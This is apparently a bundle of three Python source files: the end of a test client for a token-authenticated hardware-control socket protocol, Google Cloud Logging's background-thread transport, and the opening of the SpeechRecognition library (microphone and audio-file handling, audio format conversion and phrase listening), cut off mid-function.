log("Pin %d mode INPUT_PULLUP" % pin)
elif mode == 'pd':
log("Pin %d mode INPUT_PULLDOWN" % pin)
else:
log("Unknown pin %d mode: %s" % (pin, mode))
elif cmd == 'dw':
pin = int(params.pop(0))
val = params.pop(0)
log("Digital write pin %d, value %s" % (pin, val))
elif cmd == 'aw':
pin = int(params.pop(0))
val = params.pop(0)
log("Analog write pin %d, value %s" % (pin, val))
elif cmd == 'dr': # This should read digital pin
pin = int(params.pop(0))
log("Digital read pin %d" % pin)
conn.sendall(hw("dw", pin, 1)) # Send value
elif cmd == 'ar': # This should do ADC read
pin = int(params.pop(0))
log("Analog read pin %d" % pin)
conn.sendall(hw("aw", pin, 123)) # Send value
### VIRTUAL pin operations
elif cmd == 'vw': # This should call user handler
pin = int(params.pop(0))
val = params.pop(0)
log("Virtual write pin %d, value %s" % (pin, val))
elif cmd == 'vr': # This should call user handler
pin = int(params.pop(0))
log("Virtual read pin %d" % pin)
conn.sendall(hw("vw", pin, "hello")) # Send value
else:
log("Unknown HW cmd: %s" % cmd)
static_msg_id = 1
def genMsgId():
global static_msg_id
static_msg_id += 1
return static_msg_id
# Other utilities
start_time = time.time()
def log(msg):
print "[{:7.3f}] {:}".format(float(time.time() - start_time), msg)
def dump(msg):
if DUMP:
log(msg)
def receive(sock, length):
d = []
l = 0
while l < length:
r = ''
try:
r = sock.recv(length-l)
except socket.timeout:
continue
if not r:
return ''
d.append(r)
l += len(r)
return ''.join(d)
# Threads
def readthread(conn):
while (True):
data = receive(conn, hdr.size)
if not data:
break
msg_type, msg_id, msg_len = hdr.unpack(data)
dump("Got {0}, {1}, {2}".format(msg_type, msg_id, msg_len))
if msg_type == MsgType.RSP:
pass
elif msg_type == MsgType.PING:
log("Got ping")
# Send Pong
conn.sendall(hdr.pack(MsgType.RSP, msg_id, MsgStatus.OK))
elif msg_type == MsgType.HW or msg_type == MsgType.BRIDGE:
data = receive(conn, msg_len)
# Print HW message
dump("> " + " ".join(data.split("\0")))
handle_hw(data)
else:
log("Unknown msg type")
break
def writethread(conn):
while (True):
time.sleep(10)
log("Sending heartbeat...")
conn.sendall(hdr.pack(MsgType.PING, genMsgId(), 0))
# Main code
log('Connecting to %s:%d' % (SERVER, PORT))
try:
conn = socket.create_connection((SERVER, PORT), 3)
except:
log("Can't connect")
sys.exit(1)
if NODELAY != 0:
conn.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if SNDBUF != 0:
sndbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)
log('Default SNDBUF %s changed to %s' % (sndbuf, SNDBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, SNDBUF)
if RCVBUF != 0:
rcvbuf = conn.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
log('Default RCVBUF %s changed to %s' % (rcvbuf, RCVBUF))
conn.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, RCVBUF)
# Authenticate
conn.sendall(hdr.pack(MsgType.LOGIN, genMsgId(), len(TOKEN)))
conn.sendall(TOKEN)
data = receive(conn, hdr.size)
if not data:
log("Auth timeout")
sys.exit(1)
msg_type, msg_id, status = hdr.unpack(data)
dump("Got {0}, {1}, {2}".format(msg_type, msg_id, status))
if status != MsgStatus.OK:
log("Auth failed: %d" % status)
sys.exit(1)
rt = Thread(target=readthread, args=(conn,))
wt = Thread(target=writethread, args=(conn,))
rt.start()
wt.start()
rt.join()
wt.join()
conn.close()
|
background_thread.py
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Transport for Python logging handler
Uses a background worker to log to Stackdriver Logging asynchronously.
"""
import atexit
import copy
import threading
from google.cloud.logging.handlers.transports.base import Transport
_WORKER_THREAD_NAME = 'google.cloud.logging.handlers.transport.Worker'
class _Worker(object):
"""A threaded worker that writes batches of log entries
Writes entries to the logger API.
    This class reuses a single :class:`Batch` object to write successive
entries.
Currently, the only public methods are constructing it (which also starts
it) and enqueuing :class:`Logger` (record, message) pairs.
"""
def __init__(self, logger):
self.started = False
self.stopping = False
self.stopped = False
# _entries_condition is used to signal from the main thread whether
# there are any waiting queued logger entries to be written
self._entries_condition = threading.Condition()
# _stop_condition is used to signal from the worker thread to the
# main thread that it's finished its last entries
self._stop_condition = threading.Condition()
# This object continually reuses the same :class:`Batch` object to
# write multiple entries at the same time.
self.logger = logger
self.batch = self.logger.batch()
self._thread = None
# Number in seconds of how long to wait for worker to send remaining
self._stop_timeout = 5
self._start()
def _run(self):
"""The entry point for the worker thread.
Loops until ``stopping`` is set to :data:`True`, and commits batch
entries written during :meth:`enqueue`.
"""
try:
self._entries_condition.acquire()
self.started = True
while not self.stopping:
if len(self.batch.entries) == 0:
# branch coverage of this code extremely flaky
self._entries_condition.wait() # pragma: NO COVER
if len(self.batch.entries) > 0:
self.batch.commit()
finally:
self._entries_condition.release()
# main thread may be waiting for worker thread to finish writing its
# final entries. here we signal that it's done.
self._stop_condition.acquire()
self._stop_condition.notify()
self._stop_condition.release()
def _start(self):
"""Called by this class's constructor
This method is responsible for starting the thread and registering
the exit handlers.
"""
try:
self._entries_condition.acquire()
self._thread = threading.Thread(
target=self._run, name=_WORKER_THREAD_NAME)
self._thread.setDaemon(True)
self._thread.start()
finally:
self._entries_condition.release()
atexit.register(self._stop)
def _stop(self):
"""Signals the worker thread to shut down
        Also waits up to ``_stop_timeout`` seconds for the worker to finish.
        This method is called by the ``atexit`` handler registered by
        :meth:`_start`.
"""
if not self.started or self.stopping:
return
# lock the stop condition first so that the worker
# thread can't notify it's finished before we wait
self._stop_condition.acquire()
# now notify the worker thread to shutdown
self._entries_condition.acquire()
self.stopping = True
self._entries_condition.notify()
self._entries_condition.release()
# now wait for it to signal it's finished
self._stop_condition.wait(self._stop_timeout)
self._stop_condition.release()
self.stopped = True
def enqueue(self, record, message):
"""Queues up a log entry to be written by the background thread."""
try:
self._entries_condition.acquire()
if self.stopping:
return
info = {'message': message, 'python_logger': record.name}
self.batch.log_struct(info, severity=record.levelname)
self._entries_condition.notify()
finally:
self._entries_condition.release()
class BackgroundThreadTransport(Transport):
    """Asynchronous transport that uses a background thread.
Writes logging entries as a batch process.
"""
def __init__(self, client, name):
http = copy.deepcopy(client._http)
self.client = client.__class__(
client.project, client._connection.credentials, http)
logger = self.client.logger(name)
self.worker = _Worker(logger)
def send(self, record, message):
"""Overrides Transport.send().
:type record: :class:`logging.LogRecord`
:param record: Python log record that the handler was called with.
:type message: str
:param message: The message from the ``LogRecord`` after being
formatted by the associated log formatters.
"""
self.worker.enqueue(record, message)
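# --- Usage sketch (not part of the library) ----------------------------------
# A minimal, hedged example of driving the transport directly rather than
# through a logging handler. It assumes Application Default Credentials for
# google-cloud-logging are configured; 'example_log' and 'example_logger' are
# placeholder names.
if __name__ == '__main__':
    import logging
    import time
    from google.cloud import logging as gcloud_logging

    client = gcloud_logging.Client()
    transport = BackgroundThreadTransport(client, 'example_log')
    record = logging.LogRecord(
        'example_logger', logging.INFO, __file__, 0,
        'hello from the background worker', None, None)
    # send() only enqueues; the daemon worker commits the batch asynchronously
    transport.send(record, record.getMessage())
    time.sleep(2)  # give the worker a moment to flush before the process exits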
|
__init__.py
|
#!/usr/bin/env python3
"""Library for performing speech recognition, with support for several engines and APIs, online and offline."""
__author__ = "Anthony Zhang (Uberi)"
__version__ = "3.4.6"
__license__ = "BSD"
import io, os, subprocess, wave, aifc, base64
import math, audioop, collections, threading
import platform, stat, random, uuid
import json
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
# define exceptions
class WaitTimeoutError(Exception): pass
class RequestError(Exception): pass
class UnknownValueError(Exception): pass
class AudioSource(object):
def __init__(self):
raise NotImplementedError("this is an abstract class")
def __enter__(self):
raise NotImplementedError("this is an abstract class")
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError("this is an abstract class")
class Microphone(AudioSource):
"""
Creates a new ``Microphone`` instance, which represents a physical microphone on the computer. Subclass of ``AudioSource``.
This will throw an ``AttributeError`` if you don't have PyAudio 0.2.9 or later installed.
If ``device_index`` is unspecified or ``None``, the default microphone is used as the audio source. Otherwise, ``device_index`` should be the index of the device to use for audio input.
A device index is an integer between 0 and ``pyaudio.get_device_count() - 1`` (assume we have used ``import pyaudio`` beforehand) inclusive. It represents an audio device such as a microphone or speaker. See the `PyAudio documentation <http://people.csail.mit.edu/hubert/pyaudio/docs/>`__ for more details.
The microphone audio is recorded in chunks of ``chunk_size`` samples, at a rate of ``sample_rate`` samples per second (Hertz).
Higher ``sample_rate`` values result in better audio quality, but also more bandwidth (and therefore, slower recognition). Additionally, some machines, such as some Raspberry Pi models, can't keep up if this value is too high.
    Higher ``chunk_size`` values help avoid triggering on rapidly changing ambient noise, but also make detection less sensitive. This value, generally, should be left at its default.
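    A minimal usage sketch (assumes PyAudio is installed and a working default microphone is available)::

        import speech_recognition as sr
        r = sr.Recognizer()
        with sr.Microphone() as source:  # open the default microphone
            audio = r.listen(source)     # capture a single phrase as an AudioData instance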
"""
def __init__(self, device_index = None, sample_rate = 16000, chunk_size = 1024):
# set up PyAudio
self.pyaudio_module = self.get_pyaudio()
assert device_index is None or isinstance(device_index, int), "Device index must be None or an integer"
if device_index is not None: # ensure device index is in range
audio = self.pyaudio_module.PyAudio()
try:
count = audio.get_device_count() # obtain device count
except:
audio.terminate()
raise
assert 0 <= device_index < count, "Device index out of range ({0} devices available; device index should be between 0 and {1} inclusive)".format(count, count - 1)
assert isinstance(sample_rate, int) and sample_rate > 0, "Sample rate must be a positive integer"
assert isinstance(chunk_size, int) and chunk_size > 0, "Chunk size must be a positive integer"
self.device_index = device_index
self.format = self.pyaudio_module.paInt16 # 16-bit int sampling
self.SAMPLE_WIDTH = self.pyaudio_module.get_sample_size(self.format) # size of each sample
self.SAMPLE_RATE = sample_rate # sampling rate in Hertz
self.CHUNK = chunk_size # number of frames stored in each buffer
self.audio = None
self.stream = None
@staticmethod
def get_pyaudio():
"""
Imports the pyaudio module and checks its version. Throws exceptions if pyaudio can't be found or a wrong version is installed
"""
try:
import pyaudio
except ImportError:
raise AttributeError("Could not find PyAudio; check installation")
from distutils.version import LooseVersion
if LooseVersion(pyaudio.__version__) < LooseVersion("0.2.9"):
raise AttributeError("PyAudio 0.2.9 or later is required (found version {0})".format(pyaudio.__version__))
return pyaudio
@staticmethod
def list_microphone_names():
"""
Returns a list of the names of all available microphones. For microphones where the name can't be retrieved, the list entry contains ``None`` instead.
The index of each microphone's name is the same as its device index when creating a ``Microphone`` instance - indices in this list can be used as values of ``device_index``.
"""
audio = Microphone.get_pyaudio().PyAudio()
try:
result = []
for i in range(audio.get_device_count()):
device_info = audio.get_device_info_by_index(i)
result.append(device_info.get("name"))
finally:
audio.terminate()
return result
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
self.audio = self.pyaudio_module.PyAudio()
try:
self.stream = Microphone.MicrophoneStream(
self.audio.open(
input_device_index = self.device_index, channels = 1,
format = self.format, rate = self.SAMPLE_RATE, frames_per_buffer = self.CHUNK,
input = True, # stream is an input stream
)
)
except:
self.audio.terminate()
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.stream.close()
finally:
self.stream = None
self.audio.terminate()
class MicrophoneStream(object):
def __init__(self, pyaudio_stream):
self.pyaudio_stream = pyaudio_stream
def read(self, size):
return self.pyaudio_stream.read(size, exception_on_overflow = False)
def close(self):
try:
# sometimes, if the stream isn't stopped, closing the stream throws an exception
if not self.pyaudio_stream.is_stopped():
self.pyaudio_stream.stop_stream()
finally:
self.pyaudio_stream.close()
class AudioFile(AudioSource):
"""
Creates a new ``AudioFile`` instance given a WAV/AIFF/FLAC audio file `filename_or_fileobject`. Subclass of ``AudioSource``.
If ``filename_or_fileobject`` is a string, then it is interpreted as a path to an audio file on the filesystem. Otherwise, ``filename_or_fileobject`` should be a file-like object such as ``io.BytesIO`` or similar.
Note that functions that read from the audio (such as ``recognizer_instance.record`` or ``recognizer_instance.listen``) will move ahead in the stream. For example, if you execute ``recognizer_instance.record(audiofile_instance, duration=10)`` twice, the first time it will return the first 10 seconds of audio, and the second time it will return the 10 seconds of audio right after that. This is always reset to the beginning when entering an ``AudioFile`` context.
WAV files must be in PCM/LPCM format; WAVE_FORMAT_EXTENSIBLE and compressed WAV are not supported and may result in undefined behaviour.
Both AIFF and AIFF-C (compressed AIFF) formats are supported.
FLAC files must be in native FLAC format; OGG-FLAC is not supported and may result in undefined behaviour.
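    A minimal usage sketch (``"example.wav"`` is a placeholder path)::

        import speech_recognition as sr
        r = sr.Recognizer()
        with sr.AudioFile("example.wav") as source:
            audio = r.record(source)  # read the entire file into an AudioData instance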
"""
def __init__(self, filename_or_fileobject):
if str is bytes: # Python 2 - if a file path is specified, it must either be a `str` instance or a `unicode` instance
assert isinstance(filename_or_fileobject, (str, unicode)) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
else: # Python 3 - if a file path is specified, it must be a `str` instance
assert isinstance(filename_or_fileobject, str) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
self.filename_or_fileobject = filename_or_fileobject
self.stream = None
self.DURATION = None
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
try:
# attempt to read the file as WAV
self.audio_reader = wave.open(self.filename_or_fileobject, "rb")
self.little_endian = True # RIFF WAV is a little-endian format (most ``audioop`` operations assume that the frames are stored in little-endian form)
except wave.Error:
try:
# attempt to read the file as AIFF
self.audio_reader = aifc.open(self.filename_or_fileobject, "rb")
self.little_endian = False # AIFF is a big-endian format
except aifc.Error:
# attempt to read the file as FLAC
if hasattr(self.filename_or_fileobject, "read"):
flac_data = self.filename_or_fileobject.read()
else:
with open(self.filename_or_fileobject, "rb") as f: flac_data = f.read()
# run the FLAC converter with the FLAC data to get the AIFF data
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting AIFF file in stdout, and make sure it's not mixed with any program output
"--decode", "--force-aiff-format", # decode the FLAC file into an AIFF file
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
aiff_data, stderr = process.communicate(flac_data)
aiff_file = io.BytesIO(aiff_data)
try:
self.audio_reader = aifc.open(aiff_file, "rb")
except aifc.Error:
assert False, "Audio file could not be read as WAV, AIFF, or FLAC; check if file is corrupted"
self.little_endian = False # AIFF is a big-endian format
assert 1 <= self.audio_reader.getnchannels() <= 2, "Audio must be mono or stereo"
self.SAMPLE_WIDTH = self.audio_reader.getsampwidth()
# 24-bit audio needs some special handling for old Python versions (workaround for https://bugs.python.org/issue12866)
samples_24_bit_pretending_to_be_32_bit = False
if self.SAMPLE_WIDTH == 3: # 24-bit audio
try: audioop.bias(b"", self.SAMPLE_WIDTH, 0) # test whether this sample width is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
samples_24_bit_pretending_to_be_32_bit = True # while the ``AudioFile`` instance will outwardly appear to be 32-bit, it will actually internally be 24-bit
self.SAMPLE_WIDTH = 4 # the ``AudioFile`` instance should present itself as a 32-bit stream now, since we'll be converting into 32-bit on the fly when reading
self.SAMPLE_RATE = self.audio_reader.getframerate()
self.CHUNK = 4096
self.FRAME_COUNT = self.audio_reader.getnframes()
self.DURATION = self.FRAME_COUNT / float(self.SAMPLE_RATE)
self.stream = AudioFile.AudioFileStream(self.audio_reader, self.little_endian, samples_24_bit_pretending_to_be_32_bit)
return self
def __exit__(self, exc_type, exc_value, traceback):
if not hasattr(self.filename_or_fileobject, "read"): # only close the file if it was opened by this class in the first place (if the file was originally given as a path)
self.audio_reader.close()
self.stream = None
self.DURATION = None
class AudioFileStream(object):
def __init__(self, audio_reader, little_endian, samples_24_bit_pretending_to_be_32_bit):
self.audio_reader = audio_reader # an audio file object (e.g., a `wave.Wave_read` instance)
self.little_endian = little_endian # whether the audio data is little-endian (when working with big-endian things, we'll have to convert it to little-endian before we process it)
self.samples_24_bit_pretending_to_be_32_bit = samples_24_bit_pretending_to_be_32_bit # this is true if the audio is 24-bit audio, but 24-bit audio isn't supported, so we have to pretend that this is 32-bit audio and convert it on the fly
def read(self, size = -1):
buffer = self.audio_reader.readframes(self.audio_reader.getnframes() if size == -1 else size)
if not isinstance(buffer, bytes): buffer = b"" # workaround for https://bugs.python.org/issue24608
sample_width = self.audio_reader.getsampwidth()
if not self.little_endian: # big endian format, convert to little endian on the fly
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4 (incidentally, that also means that we don't need to worry about 24-bit audio being unsupported, since Python 3.4+ always has that functionality)
buffer = audioop.byteswap(buffer, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
buffer = buffer[sample_width - 1::-1] + b"".join(buffer[i + sample_width:i:-1] for i in range(sample_width - 1, len(buffer), sample_width))
# workaround for https://bugs.python.org/issue12866
if self.samples_24_bit_pretending_to_be_32_bit: # we need to convert samples from 24-bit to 32-bit before we can process them with ``audioop`` functions
                buffer = b"".join(b"\x00" + buffer[i:i + sample_width] for i in range(0, len(buffer), sample_width)) # since we're in little endian, we prepend a zero byte to each 24-bit sample to get a 32-bit sample
if self.audio_reader.getnchannels() != 1: # stereo audio
buffer = audioop.tomono(buffer, sample_width, 1, 1) # convert stereo audio data to mono
return buffer
class AudioData(object):
def __init__(self, frame_data, sample_rate, sample_width):
assert sample_rate > 0, "Sample rate must be a positive integer"
assert sample_width % 1 == 0 and 1 <= sample_width <= 4, "Sample width must be between 1 and 4 inclusive"
self.frame_data = frame_data
self.sample_rate = sample_rate
self.sample_width = int(sample_width)
def get_raw_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the raw frame data for the audio represented by the ``AudioData`` instance.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `RAW/PCM audio file <https://en.wikipedia.org/wiki/Raw_audio_format>`__.
"""
assert convert_rate is None or convert_rate > 0, "Sample rate to convert to must be a positive integer"
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 4), "Sample width to convert to must be between 1 and 4 inclusive"
raw_data = self.frame_data
# make sure unsigned 8-bit audio (which uses unsigned samples) is handled like higher sample width audio (which uses signed samples)
if self.sample_width == 1:
raw_data = audioop.bias(raw_data, 1, -128) # subtract 128 from every sample to make them act like signed samples
# resample audio at the desired rate if specified
if convert_rate is not None and self.sample_rate != convert_rate:
raw_data, _ = audioop.ratecv(raw_data, self.sample_width, 1, self.sample_rate, convert_rate, None)
# convert samples to desired sample width if specified
if convert_width is not None and self.sample_width != convert_width:
if convert_width == 3: # we're converting the audio into 24-bit (workaround for https://bugs.python.org/issue12866)
raw_data = audioop.lin2lin(raw_data, self.sample_width, 4) # convert audio into 32-bit first, which is always supported
try: audioop.bias(b"", 3, 0) # test whether 24-bit audio is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
raw_data = b"".join(raw_data[i + 1:i + 4] for i in range(0, len(raw_data), 4)) # since we're in little endian, we discard the first byte from each 32-bit sample to get a 24-bit sample
else: # 24-bit audio fully supported, we don't need to shim anything
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
else:
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
# if the output is 8-bit audio with unsigned samples, convert the samples we've been treating as signed to unsigned again
if convert_width == 1:
raw_data = audioop.bias(raw_data, 1, 128) # add 128 to every sample to make them act like unsigned samples again
return raw_data
def get_wav_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the contents of a WAV file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `WAV file <https://en.wikipedia.org/wiki/WAV>`__.
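        For example, the following sketch (where ``audio`` is an ``AudioData`` instance and ``"out.wav"`` is a placeholder path) writes a playable WAV file::

            with open("out.wav", "wb") as f:
                f.write(audio.get_wav_data())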
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
# generate the WAV file contents
with io.BytesIO() as wav_file:
wav_writer = wave.open(wav_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
wav_writer.setframerate(sample_rate)
wav_writer.setsampwidth(sample_width)
wav_writer.setnchannels(1)
wav_writer.writeframes(raw_data)
wav_data = wav_file.getvalue()
finally: # make sure resources are cleaned up
wav_writer.close()
return wav_data
def get_aiff_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the contents of an AIFF-C file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `AIFF-C file <https://en.wikipedia.org/wiki/Audio_Interchange_File_Format>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
        # the AIFF format is big-endian, so we need to convert the little-endian raw data to big-endian
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4
raw_data = audioop.byteswap(raw_data, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
raw_data = raw_data[sample_width - 1::-1] + b"".join(raw_data[i + sample_width:i:-1] for i in range(sample_width - 1, len(raw_data), sample_width))
# generate the AIFF-C file contents
with io.BytesIO() as aiff_file:
aiff_writer = aifc.open(aiff_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
aiff_writer.setframerate(sample_rate)
aiff_writer.setsampwidth(sample_width)
aiff_writer.setnchannels(1)
aiff_writer.writeframes(raw_data)
aiff_data = aiff_file.getvalue()
finally: # make sure resources are cleaned up
aiff_writer.close()
return aiff_data
def get_flac_data(self, convert_rate = None, convert_width = None):
"""
Returns a byte string representing the contents of a FLAC file containing the audio represented by the ``AudioData`` instance.
Note that 32-bit FLAC is not supported. If the audio data is 32-bit and ``convert_width`` is not specified, then the resulting FLAC will be a 24-bit FLAC.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `FLAC file <https://en.wikipedia.org/wiki/FLAC>`__.
"""
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 3), "Sample width to convert to must be between 1 and 3 inclusive"
        if self.sample_width > 3 and convert_width is None: # resulting WAV data would be 32-bit, which is not convertible to FLAC using our encoder
convert_width = 3 # the largest supported sample width is 24-bit, so we'll limit the sample width to that
# run the FLAC converter with the WAV data to get the FLAC data
wav_data = self.get_wav_data(convert_rate, convert_width)
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting FLAC file in stdout, and make sure it's not mixed with any program output
"--best", # highest level of compression available
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
flac_data, stderr = process.communicate(wav_data)
return flac_data
class Recognizer(AudioSource):
def __init__(self):
"""
Creates a new ``Recognizer`` instance, which represents a collection of speech recognition functionality.
"""
self.energy_threshold = 300 # minimum audio energy to consider for recording
self.dynamic_energy_threshold = True
self.dynamic_energy_adjustment_damping = 0.15
self.dynamic_energy_ratio = 1.5
self.pause_threshold = 0.8 # seconds of non-speaking audio before a phrase is considered complete
self.phrase_threshold = 0.3 # minimum seconds of speaking audio before we consider the speaking audio a phrase - values below this are ignored (for filtering out clicks and pops)
self.non_speaking_duration = 0.5 # seconds of non-speaking audio to keep on both sides of the recording
def record(self, source, duration = None, offset = None):
"""
Records up to ``duration`` seconds of audio from ``source`` (an ``AudioSource`` instance) starting at ``offset`` (or at the beginning if not specified) into an ``AudioData`` instance, which it returns.
If ``duration`` is not specified, then it will record until there is no more audio input.
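        For example, the following sketch (where ``r`` is a ``Recognizer`` and ``source`` is an entered ``AudioFile``) reads two consecutive 10-second slices::

            first_ten = r.record(source, duration=10)
            next_ten = r.record(source, duration=10)  # continues where the previous call left off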
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before recording, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
frames = io.BytesIO()
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
offset_time = 0
offset_reached = False
while True: # loop for the total number of chunks needed
if offset and not offset_reached:
offset_time += seconds_per_buffer
if offset_time > offset:
offset_reached = True
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break
if offset_reached or not offset:
elapsed_time += seconds_per_buffer
if duration and elapsed_time > duration: break
frames.write(buffer)
frame_data = frames.getvalue()
frames.close()
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def adjust_for_ambient_noise(self, source, duration = 1):
"""
Adjusts the energy threshold dynamically using audio from ``source`` (an ``AudioSource`` instance) to account for ambient noise.
Intended to calibrate the energy threshold with the ambient energy level. Should be used on periods of audio without speech - will stop early if any speech is detected.
The ``duration`` parameter is the maximum number of seconds that it will dynamically adjust the threshold for before returning. This value should be at least 0.5 in order to get a representative sample of the ambient noise.
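        A typical calibration sketch (``r`` is a ``Recognizer``; ``sr`` is the imported ``speech_recognition`` package)::

            with sr.Microphone() as source:
                r.adjust_for_ambient_noise(source)  # sample ambient noise for about one second
                audio = r.listen(source)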
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before adjusting, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
# adjust energy threshold until a phrase starts
while True:
elapsed_time += seconds_per_buffer
if elapsed_time > duration: break
buffer = source.stream.read(source.CHUNK)
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
            # dynamically adjust the energy threshold using asymmetric weighted average
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
def listen(self, source, timeout = None):
"""
Records a single phrase from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
This is done by waiting until the audio has an energy above ``recognizer_instance.energy_threshold`` (the user has started speaking), and then recording until it encounters ``recognizer_instance.pause_threshold`` seconds of non-speaking or there is no more audio input. The ending silence is not included.
The ``timeout`` parameter is the maximum number of seconds that it will wait for a phrase to start before giving up and throwing an ``speech_recognition.WaitTimeoutError`` exception. If ``timeout`` is ``None``, it will wait indefinitely.
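        A minimal sketch (``r`` is a ``Recognizer``; ``sr`` is the imported ``speech_recognition`` package)::

            with sr.Microphone() as source:
                try:
                    audio = r.listen(source, timeout=5)  # wait at most 5 seconds for a phrase to start
                except sr.WaitTimeoutError:
                    audio = None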
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before listening, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of non-speaking audio before the phrase is complete
phrase_buffer_count = int(math.ceil(self.phrase_threshold / seconds_per_buffer)) # minimum number of buffers of speaking audio before we consider the speaking audio a phrase
non_speaking_buffer_count = int(math.ceil(self.non_speaking_duration / seconds_per_buffer)) # maximum number of buffers of non-speaking audio to retain before and after
# read audio input for phrases until there is a phrase that is long enough
elapsed_time = 0 # number of seconds of audio read
while True:
frames = collections.deque()
# store audio input until the phrase starts
while True:
elapsed_time += seconds_per_buffer
if timeout and elapsed_time > timeout: # handle timeout if specified
raise WaitTimeoutError("listening timed out")
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
if len(frames) > non_speaking_buffer_count: # ensure we only keep the needed amount of non-speaking buffers
frames.popleft()
# detect whether speaking has started on audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold: break
                # dynamically adjust the energy threshold using asymmetric weighted average
if self.dynamic_energy_threshold:
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
# read audio input until the phrase ends
pause_count, phrase_count = 0, 0
while True:
elapsed_time += seconds_per_buffer
